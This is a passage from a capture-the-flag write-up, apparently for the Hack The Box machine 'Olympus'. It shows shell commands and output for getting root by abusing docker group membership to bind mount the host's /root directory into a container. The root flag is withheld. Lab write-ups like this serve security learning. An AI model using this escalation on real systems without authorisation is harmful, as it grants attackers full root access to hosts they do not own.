    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-c8834ba5f981
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
prometheus@olympus:~$ ls -lah /
total 84K
drwxr-xr-x  22 root root 4.0K Apr  2  2018 .
drwxr-xr-x  22 root root 4.0K Apr  2  2018 ..
drwxr-xr-x   2 root root 4.0K Apr 15  2018 bin
drwxr-xr-x   3 root root 4.0K Apr 15  2018 boot
drwxr-xr-x  17 root root 3.1K Dec  4 12:50 dev
drwxr-xr-x  85 root root 4.0K Apr 15  2018 etc
drwxr-xr-x   3 root root 4.0K Apr  4  2018 home
lrwxrwxrwx   1 root root   29 Apr  2  2018 initrd.img -> boot/initrd.img-4.9.0-6-amd64
lrwxrwxrwx   1 root root   29 Apr  2  2018 initrd.img.old -> boot/initrd.img-4.9.0-4-amd64
drwxr-xr-x  16 root root 4.0K Apr  2  2018 lib
drwxr-xr-x   2 root root 4.0K Apr  2  2018 lib64
drwx------   2 root root  16K Apr  2  2018 lost+found
drwxr-xr-x   3 root root 4.0K Apr  2  2018 media
drwxr-xr-x   2 root root 4.0K Apr  2  2018 mnt
drwxr-xr-x   2 root root 4.0K Apr  2  2018 opt
dr-xr-xr-x 167 root root    0 Dec  4 12:50 proc
drwx------   4 root root 4.0K Apr 15  2018 root
drwxr-xr-x  17 root root  600 Dec  5 01:28 run
drwxr-xr-x   2 root root 4.0K Apr 15  2018 sbin
drwxr-xr-x   2 root root 4.0K Apr  2  2018 srv
dr-xr-xr-x  13 root root    0 Dec  5 01:13 sys
drwxrwxrwt   9 root root 4.0K Dec  5 01:38 tmp
drwxr-xr-x  10 root root 4.0K Apr  2  2018 usr
drwxr-xr-x  11 root root 4.0K Apr  2  2018 var
lrwxrwxrwx   1 root root   26 Apr  2  2018 vmlinuz -> boot/vmlinuz-4.9.0-6-amd64
lrwxrwxrwx   1 root root   26 Apr  2  2018 vmlinuz.old -> boot/vmlinuz-4.9.0-4-amd64

I’m not in a docker container anymore.

prometheus@olympus:~$ id
uid=1000(prometheus) gid=1000(prometheus) groups=1000(prometheus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth),999(docker)

Looks like I don’t have sudo, but I am a member of the docker group, which gives the opportunity to elevate my rights: being a member of the docker group is the same as giving a user full root access to the system (link).
The way I’m going to get root is to bind mount the host’s /root folder into a docker container. The steps and explanation can be found here.
Docker has a very useful help function: you just give it a command as argument and with --help you get a list of further possibilities.

prometheus@olympus:~$ docker container ls
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                                    NAMES
f00ba96171c5        crete               "docker-php-entrypoi…"   8 months ago        Up 13 hours         0.0.0.0:80->80/tcp                       crete
ce2ecb56a96e        rodhes              "/etc/bind/entrypoin…"   8 months ago        Up 13 hours         0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp   rhodes
620b296204a3        olympia             "/usr/sbin/sshd -D"      8 months ago        Up 13 hours         0.0.0.0:2222->22/tcp                     olympia
prometheus@olympus:~$ docker run -v /root:/tmp/n0w4n -ti rodhes bash
cat: /etc/hostip: No such file or directory
root@09c736226d89:/#

With docker -v I bind mounted /root to /tmp/n0w4n.

root@09c736226d89:/# cd /tmp/n0w4n/
root@09c736226d89:/tmp/n0w4n# ls -lah
total 28K
drwx------ 4 root root 4.0K Apr 15  2018 .
drwxrwxrwt 1 root root 4.0K Dec  5 09:05 ..
-rw------- 1 root root    0 Apr 15  2018 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwx------ 2 root root 4.0K Apr  2  2018 .cache
drwxr-xr-x 2 root root 4.0K Apr 15  2018 .nano
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-r-------- 1 root root   33 Apr  4  2018 root.txt
root@09c736226d89:/tmp/n0w4n# cat root.txt
[no spoilers]

On entering that container /root was mounted at /tmp/n0w4n.
And there is the final flag.
 
Normally I don’t really like CTF minded machines on HTB, but this one was really fun to do.
 
